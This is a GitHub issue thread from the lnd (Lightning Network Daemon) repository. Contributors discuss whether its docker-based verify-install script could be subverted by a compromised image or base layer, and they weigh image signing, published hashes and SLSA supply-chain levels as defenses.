search

lightningnetwork / lnd

Lightning Network Daemon ⚡️
MIT License
7.62k stars 2.07k forks source link

Question about verify install #5780

Open naveensrinivasan opened 2 years ago

naveensrinivasan commented 2 years ago

Background

The docs in https://github.com/lightningnetwork/lnd/blob/master/docs/release.md refer to docker run --rm --entrypoint="" lightninglabs/lnd:v0.12.0-beta /verify-install.sh to verify install.

  1. What if the verify install script was compromised in the docker image. What I mean is what if a malicious actor gets hold of the docker push keys and pushes his own image with verify install. What would happen then?
  2. This validates the lnd binary, How are you sure the alpine image that this is being built on hasn't been compromised?
  3. Could the alpine image have been compromised and have malware in the container image?

All of these questions relating to zero trusts and supply chain.

naveensrinivasan commented 2 years ago

Supply-chain Levels for Software Artifact (SLSA) https://slsa.dev/levels.

The ideal would be level 4. But level 2 is a good target to get to.

https://security.googleblog.com/2021/09/distroless-builds-are-now-slsa-2.html

Roasbeef commented 2 years ago

Re #1, I think implementing proper image signing on our end would handle that, since it would allow users to verify the integrity of the image they receive. You're correct in that rn the instructions assume that the install script itself wasn't modified. That can be partially mitigated by including the hash of that (rn we just include the entire source's digest) along side the published releases.

naveensrinivasan commented 2 years ago

Now if the code releases the hash on install script and then it has to be validated by another script.

It is turtles all the way down.

The only option I can think of is signing the container.

naveensrinivasan commented 2 years ago

Supply-chain Levels for Software Artifact (SLSA) https://slsa.dev/levels.

The ideal would be level 4. But level 2 is a good target to get to.

https://security.googleblog.com/2021/09/distroless-builds-are-now-slsa-2.html

k8s is evaluating SLSA https://twitter.com/puerco/status/1441209142396346376

Kixunil commented 2 years ago

These steps can help you avoid malware:

  1. Don't use docker
  2. Install good secure OS (e.g. Debian)
  3. Download just the script, read it and verify, including fingerprints from independent sources
  4. Download, verify, install manually

Optionally automate 3.

naveensrinivasan commented 2 years ago

These steps can help you avoid malware:

  1. Don't use docker

  2. Install good secure OS (e.g. Debian)

  3. Download just the script, read it and verify, including fingerprints from independent sources

  4. Download, verify, install manually

Optionally automate 3.

Why not use Docker? Can you please provide specifics on that?

Recommendations are futile without evidence/details.

Kixunil commented 2 years ago

No docker - no problem with unsigned images.